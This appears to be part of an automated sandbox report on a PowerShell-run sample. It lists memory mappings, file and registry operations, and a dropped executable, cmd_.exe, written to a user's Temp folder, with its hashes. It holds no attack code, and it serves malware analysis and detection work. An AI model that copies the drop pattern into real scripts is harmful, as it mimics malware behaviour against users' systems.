private_0x0000000001c30000 0x01c30000 0x01c3ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000001c40000 0x01c40000 0x01d1efff Pagefile Backed Memory Readable True False False -
cversions.2.db 0x01d20000 0x01d23fff Memory Mapped File Readable True False False -
private_0x0000000001d30000 0x01d30000 0x01daffff Private Memory Readable, Writable, Executable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x01db0000 0x01dcffff Memory Mapped File Readable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000d.db 0x01dd0000 0x01dfffff Memory Mapped File Readable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x01e00000 0x01e65fff Memory Mapped File Readable True False False -
pagefile_0x0000000001e70000 0x01e70000 0x01e70fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e80000 0x01e80000 0x01e82fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000001e90000 0x01e90000 0x01e90fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01ebffff Private Memory - True False False -
private_0x0000000001ec0000 0x01ec0000 0x01ecffff Private Memory Readable, Writable True False False -
l_intl.nls 0x01ed0000 0x01ed2fff Memory Mapped File Readable False False False -
private_0x0000000001ee0000 0x01ee0000 0x01ee0fff Private Memory Readable, Writable True False False -
sorttbls.nlp 0x01ef0000 0x01ef4fff Memory Mapped File Readable False False False -
microsoft.wsman.runtime.dll 0x01f00000 0x01f07fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000001f10000 0x01f10000 0x01f10fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001f20000 0x01f20000 0x01f20fff Pagefile Backed Memory Readable True False False -
private_0x0000000001f30000 0x01f30000 0x01faffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01fb0000 0x0227efff Memory Mapped File Readable False False False -
private_0x0000000002280000 0x02280000 0x022fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002300000 0x02300000 0x02310fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002340000 0x02340000 0x023bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000023c0000 0x023c0000 0x027b2fff Pagefile Backed Memory Readable True False False -
sortkey.nlp 0x027c0000 0x02800fff Memory Mapped File Readable False False False -
private_0x0000000002850000 0x02850000 0x028cffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x028d0000 0x0298ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000002990000 0x02990000 0x0299ffff Private Memory Readable, Writable True False False -
private_0x00000000029e0000 0x029e0000 0x02a5ffff Private Memory Readable, Writable True False False -
private_0x0000000002a90000 0x02a90000 0x02b0ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002b10000 0x02b10000 0x02c0ffff Private Memory Readable, Writable True False False -
private_0x0000000002c10000 0x02c10000 0x1ac0ffff Private Memory Readable, Writable True False False -
private_0x000000001ac10000 0x1ac10000 0x1b2dffff Private Memory Readable, Writable True False False -
private_0x000000001b2e0000 0x1b2e0000 0x1b3e0fff Private Memory Readable, Writable True False False -
private_0x000000001b410000 0x1b410000 0x1b48ffff Private Memory Readable, Writable True False False - 0x1b490000 0x1b771fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000001b780000 0x1b780000 0x1b87ffff Private Memory Readable, Writable True False False -
mscorrc.dll 0x1b880000 0x1b8d3fff Memory Mapped File Readable True False False -
system.transactions.dll 0x1e230000 0x1e278fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr80.dll 0x74be0000 0x74ca8fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771d0000 0x772c9fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x772d0000 0x773eefff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x775c0000 0x775c6fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
powershell.exe 0x13fe40000 0x13feb6fff Memory Mapped File Readable, Writable, Executable False False False -
culture.dll 0x642ff4a0000 0x642ff4a9fff Memory Mapped File Readable, Writable, Executable True False False - 0x7fee2eb0000 0x7fee3044fff Memory Mapped File Readable, Writable, Executable True False False - 0x7fee3050000 0x7fee31bbfff Memory Mapped File Readable, Writable, Executable True False False - 0x7fee31c0000 0x7fee3864fff Memory Mapped File Readable, Writable, Executable True False False - 0x7fee3870000 0x7fee3987fff Memory Mapped File Readable, Writable, Executable True False False - 0x7fee3990000 0x7fee3ba5fff Memory Mapped File Readable, Writable, Executable True False False - 0x7fee3bb0000 0x7fee3c94fff Memory Mapped File Readable, Writable, Executable True False False - 0x7fee3ca0000 0x7fee3d49fff Memory Mapped File Readable, Writable, Executable True False False - 0x7fee3d50000 0x7fee407dfff Memory Mapped File Readable, Writable, Executable True False False - 0x7fee4080000 0x7fee4bdcfff Memory Mapped File Readable, Writable, Executable True False False - 0x7fee4be0000 0x7fee5602fff Memory Mapped File Readable, Writable, Executable True False False - 0x7fee5610000 0x7fee64ebfff Memory Mapped File Readable, Writable, Executable True False False -
mscorwks.dll 0x7fee64f0000 0x7fee6e8cfff Memory Mapped File Readable, Writable, Executable True False False -
mscoreei.dll 0x7fee8f80000 0x7fee9018fff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x7fef2a50000 0x7fef2abefff Memory Mapped File Readable, Writable, Executable True False False -
ntshrui.dll 0x7fef2f20000 0x7fef2f9ffff Memory Mapped File Readable, Writable, Executable False False False - 0x7fef3670000 0x7fef36adfff Memory Mapped File Readable, Writable, Executable True False False - 0x7fef36b0000 0x7fef36e1fff Memory Mapped File Readable, Writable, Executable True False False - 0x7fef36f0000 0x7fef3758fff Memory Mapped File Readable, Writable, Executable True False False - 0x7fef3760000 0x7fef3811fff Memory Mapped File Readable, Writable, Executable True False False -
shdocvw.dll 0x7fef75d0000 0x7fef7603fff Memory Mapped File Readable, Writable, Executable False False False -
shfolder.dll 0x7fef7a80000 0x7fef7a86fff Memory Mapped File Readable, Writable, Executable False False False -
linkinfo.dll 0x7fef93f0000 0x7fef93fbfff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x7fefa190000 0x7fefa1e6fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x7fefa8c0000 0x7fefa8cefff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x7fefaee0000 0x7fefaeeafff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x7fefaf10000 0x7fefaf28fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x7fefb2b0000 0x7fefb2dcfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7fefbb50000 0x7fefbba5fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x7fefbc00000 0x7fefbdf3fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x7fefc100000 0x7fefc22bfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7fefc500000 0x7fefc50bfff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x7fefc6e0000 0x7fefc6fdfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7fefc930000 0x7fefc976fff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7fefcc30000 0x7fefcc46fff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x7fefd130000 0x7fefd152fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7fefd230000 0x7fefd23efff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7fefd340000 0x7fefd34efff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7fefd430000 0x7fefd49afff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7fefd540000 0x7fefd575fff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x7fefd580000 0x7fefd599fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7fefd710000 0x7fefd912fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7fefd970000 0x7fefd98efff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x7fefdb10000 0x7fefdce6fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x7fefdd90000 0x7fefdd9dfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7fefdda0000 0x7fefde76fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7fefde80000 0x7fefdf1efff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7fefdf20000 0x7fefe028fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7fefe030000 0x7fefe05dfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7fefe060000 0x7fefe0c6fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7fefe0d0000 0x7fefe1fcfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7fefe2a0000 0x7fefe37afff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x7fefe4c0000 0x7fefe588fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7fefe590000 0x7fefe628fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x7fefe890000 0x7fefe8e1fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7fefe8f0000 0x7fefe960fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7fefe970000 0x7feff6f7fff Memory Mapped File Readable, Writable, Executable False False False -
apisetschema.dll 0x7feff710000 0x7feff710fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000007ff00040000 0x7ff00040000 0x7ff0004ffff Private Memory - True False False -
private_0x000007ff00050000 0x7ff00050000 0x7ff0005ffff Private Memory - True False False -
private_0x000007ff00060000 0x7ff00060000 0x7ff000fffff Private Memory - True False False -
private_0x000007ff00100000 0x7ff00100000 0x7ff0010ffff Private Memory - True False False -
private_0x000007ff00110000 0x7ff00110000 0x7ff0017ffff Private Memory - True False False -
private_0x000007ff00180000 0x7ff00180000 0x7ff0018ffff Private Memory - True False False -
private_0x000007ff00190000 0x7ff00190000 0x7ff0019ffff Private Memory - True False False -
private_0x000007fffff10000 0x7fffff10000 0x7fffff1ffff Private Memory Readable, Writable, Executable True False False -
private_0x000007fffff20000 0x7fffff20000 0x7fffffaffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False -
private_0x000007fffffd3000 0x7fffffd3000 0x7fffffd4fff Private Memory Readable, Writable True False False -
private_0x000007fffffd5000 0x7fffffd5000 0x7fffffd6fff Private Memory Readable, Writable True False False -
private_0x000007fffffd7000 0x7fffffd7000 0x7fffffd8fff Private Memory Readable, Writable True False False -
private_0x000007fffffd9000 0x7fffffd9000 0x7fffffdafff Private Memory Readable, Writable True False False -
private_0x000007fffffdb000 0x7fffffdb000 0x7fffffdcfff Private Memory Readable, Writable True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory Readable, Writable True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory Readable, Writable True False False -
For performance reasons, the remaining 76 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\qj4sukboe\appdata\local\temp\cmd_.exe 174.00 KB MD5: 3e3d2e9fe0976c4c8d4c6be03f5d7c79
SHA1: b079b7235ac9ce53d564e8e81e1419f870fb7550
SHA256: 30e2f8e905e4596946e651627c450e3cc574fdf58ea6e41cdad1f06190a05216
Host Behavior
File (173)
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Create C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Create C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 7
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 5
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 6
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 6
Create C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create CONIN$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\\System.Management.Automation.dll type = file_attributes True 2
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 2
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 2
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 1
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 1
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Get Info C:\Users\qj4SUKboE type = file_attributes True 1
Get Info C:\ type = file_attributes True 4
Get Info C:\Users\qj4SUKboE\Desktop type = file_attributes True 5
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_attributes True 2
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_type True 2
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Get Info C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe type = file_type True 2
Get Info C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe type = file_attributes True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
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Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 26
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 3
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4018 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 78, size_out = 0 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 3022 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 50, size_out = 0 True 1
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 5
Read CONIN$ size = 8192 False 1
Write CONOUT$ size = 79 True 1
Write CONOUT$ size = 1 True 1
Write CONOUT$ size = 79 True 1
Write CONOUT$ size = 30 True 1
Write CONOUT$ size = 1 True 1
Write C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe size = 4096 True 2
Write C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe size = 8677 True 1
Write C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe size = 65536 True 1
Write C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe size = 21584 True 1
Write C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe size = 63888 True 1
Write C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe size = 5808 True 1
Write C:\Users\qj4SUKboE\AppData\Local\Temp\cmd_.exe size = 4491 True 1
Write CONOUT$ size = 31 True 1
Registry (211)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Open Key HKEY_CURRENT_USER\Environment - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 9
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
